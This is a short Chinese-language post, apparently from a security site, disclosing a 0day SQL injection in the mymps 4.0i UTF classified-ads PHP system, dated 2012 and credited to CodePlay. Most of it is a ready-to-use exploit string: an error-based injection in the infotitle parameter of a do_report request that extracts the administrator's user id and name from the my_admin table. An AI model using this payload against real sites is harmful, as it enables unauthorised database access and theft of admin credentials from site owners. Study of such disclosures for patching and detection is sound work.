蚂蚁php分类信息系统 mymps 4.0i utf版0Day

发布日期:2012-12-17
发布作者:CodePlay

漏洞类型:SQL注入

利用代码如下:

代码如下

 part=do_report&infoid=87382231&infotitle=123','ip1',(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x6F756F757E,userid,0x2D,uname,0x7E31)%20FROM%20my_admin%20where id=1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))#&report_type=2&content=asasas

发表评论